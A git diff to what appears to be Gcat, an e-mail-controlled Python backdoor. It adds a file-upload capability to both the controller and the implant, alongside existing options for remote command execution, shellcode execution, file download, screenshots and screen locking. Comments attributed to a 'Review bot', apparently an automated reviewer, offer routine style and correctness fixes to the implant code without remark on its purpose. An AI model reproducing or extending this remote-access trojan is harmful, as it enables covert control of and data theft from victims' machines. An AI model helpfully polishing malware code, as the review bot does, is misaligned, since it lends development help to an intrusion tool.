diff --git a/README.md b/README.md
index 9871bd7..e99d80b 100644
--- a/README.md
+++ b/README.md
@@ -88,5 +88,5 @@
 To Do
 =====
 - Multi-platform support
-- Command to upload files
+- ~~Command to upload files~~
 - Transport crypto & obfuscation
diff --git a/gcat.py b/gcat.py
index d7c960e..70de8b2 100644
--- a/gcat.py
+++ b/gcat.py
@@ -12,6 +12,7 @@
 from datetime import datetime
 from base64 import b64decode
 from smtplib import SMTP
+from argparse import RawTextHelpFormatter
 from email.MIMEMultipart import MIMEMultipart
 from email.MIMEBase import MIMEBase
 from email.MIMEText import MIMEText
@@ -168,7 +169,40 @@ def logout():
 if __name__ == '__main__':
- parser = argparse.ArgumentParser(description="Gcat", version='0.0.1')
+ parser = argparse.ArgumentParser(description="""
+ dP
+ 88
+ .d8888b. .d8888b. .d8888b. d8888P
+ 88' `88 88' `"" 88' `88 88
+ 88. .88 88. ... 88. .88 88
+ `8888P88 `88888P' `88888P8 dP
+ .88
+ d8888P
+
+
+ .__....._ _.....__,
+ .": o :': ;': o :".
+ `. `-' .'. .'. `-' .'
+ `---' `---'
+
+ _...----... ... ... ...----..._
+ .-'__..-''---- `. `"` .' ----'''-..__`-.
+ '.-' _.--''' `-._.-' ''''--._ `-.`
+ ' .-"' : `"-. `
+ ' `. _.'"'._ .' `
+ `. ,.-'" "'-., .'
+ `. .'
+ jgs `-._ _.-'
+ `"'--...___...--'"`
+
+ ...IM IN YUR COMPUTERZ...
+
+ WATCHIN YUR SCREENZ
+""",
+ version='1.0.0',
+ formatter_class=RawTextHelpFormatter,
+ epilog='Meow!')
+
 parser.add_argument("-id", dest='id', type=str, default=None, help="Client to target")
 parser.add_argument('-jobid', dest='jobid', default=None, type=str, help='Job id to retrieve')
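Review bot: The rewritten `ArgumentParser(...)` call still passes `version='1.0.0'` to the constructor, a keyword that argparse deprecated in Python 2.7 and that Python 3 rejects; the supported form is `parser.add_argument('-v', '--version', action='version', version='1.0.0')`. The import hunk above adds `from argparse import RawTextHelpFormatter` although this call already uses the module as `argparse.ArgumentParser`, so `formatter_class=argparse.RawTextHelpFormatter` would keep one import style and make the new import unnecessary. The `if __name__ == '__main__':` block continues past the end of the hunk.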
@@ -181,6 +215,7 @@ def logout():
 slogopts = sgroup.add_mutually_exclusive_group()
 slogopts.add_argument("-cmd", metavar='CMD', dest='cmd', type=str, help='Execute a system command')
 slogopts.add_argument("-download", metavar='PATH', dest='download', type=str, help='Download a file from a clients system')
+ slogopts.add_argument("-upload", nargs=2, metavar=('SRC', 'DST'), help="Upload a file to the clients system")
 slogopts.add_argument("-exec-shellcode", metavar='FILE',type=argparse.FileType('rb'), dest='shellcode', help='Execute supplied shellcode on a client')
 slogopts.add_argument("-screenshot", dest='screen', action='store_true', help='Take a screenshot')
 slogopts.add_argument("-lock-screen", dest='lockscreen', action='store_true', help='Lock the clients screen')
@@ -212,6 +247,9 @@ def logout():
 elif args.download:
 gcat.sendEmail(args.id, jobid, 'download', r'{}'.format(args.download))
+ elif args.upload:
+ gcat.sendEmail(args.id, jobid, 'upload', r'{}'.format(args.upload[1]), [args.upload[0]])
+
 elif args.screen:
 gcat.sendEmail(args.id, jobid, 'screenshot')
diff --git a/implant.py b/implant.py
index 5ebc6c7..459ba22 100644
--- a/implant.py
+++ b/implant.py
@@ -16,6 +16,7 @@
 #import logging
 #from traceback import print_exc, format_exc
+from base64 import b64decode
 from smtplib import SMTP
 from email.MIMEMultipart import MIMEMultipart
 from email.MIMEBase import MIMEBase
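Review bot: In the new `elif args.upload:` branch, `r'{}'.format(args.upload[1])` is a no-op wrapper, since the raw prefix changes nothing in a literal without backslashes and argparse already returns strings; `args.upload[1]` says the same thing (the pattern is copied from the `download` branch above it). The call also reverses the command-line order, sending `DST` as the job argument and `SRC` in the trailing list, which presumably is the attachment list (`sendEmail` is not in the diff), so a one-line comment such as `# DST is the job argument; SRC is sent as the attachment` would help. In the option hunk before it, `-upload` omits the `dest=` that every visible sibling spells out; argparse derives `upload` from the flag, but `dest='upload'` would keep the group uniform. The enclosing `__main__` block starts and ends outside both hunks.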
@@ -377,6 +378,25 @@ def run(self):
 except Exception as e:
 sendEmail({'cmd': 'download', 'res': 'Failed: {}'.format(e)}, self.jobid)
+class upload(threading.Thread):
+
+ def __init__(self, jobid, dest, attachment):
+ threading.Thread.__init__(self)
+ self.jobid = jobid
+ self.dest = dest
+ self.attachment = attachment
+
+ self.daemon = True
+ self.start()
+
+ def run(self):
+ try:
+ with open(self.dest, 'wb') as fileh:
+ fileh.write(b64decode(self.attachment))
+ sendEmail({'cmd': 'upload', 'res': 'Success'}, self.jobid)
+ except Exception as e:
+ sendEmail({'cmd': 'upload', 'res': 'Failed: {}'.format(e)}, self.jobid)
+
 class lockScreen(threading.Thread):
 def __init__(self, jobid):
@@ -560,9 +580,12 @@ def checkJobs():
 elif cmd == 'download':
 download(jobid, arg)
+ elif cmd == 'upload':
+ upload(jobid, arg, msg.attachment)
+
 elif cmd == 'screenshot':
 screenshot(jobid)
-
+
 elif cmd == 'cmd':
 execCmd(arg, jobid)
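Review bot: The new `upload` class is undocumented, and its `run` opens `self.dest` with `'wb'` before `b64decode(self.attachment)` is evaluated, so the destination is created or truncated even when the attachment is missing or malformed and the job then reports `Failed`. Both values reach it from the `checkJobs` hunk below as `arg` and `msg.attachment` with no check visible in either hunk, so this is a write of message-supplied bytes to a message-supplied path with the privileges of the running process. A class docstring should state that plainly, for example `"""Write the base64-decoded job attachment to dest, overwriting any existing file; report Success/Failed by e-mail."""`. For anyone triaging a host, the observable side effects are a new or zero-length file at the destination and the thread's result message. `checkJobs` starts and ends outside its hunk, so how `msg` is obtained cannot be judged from here.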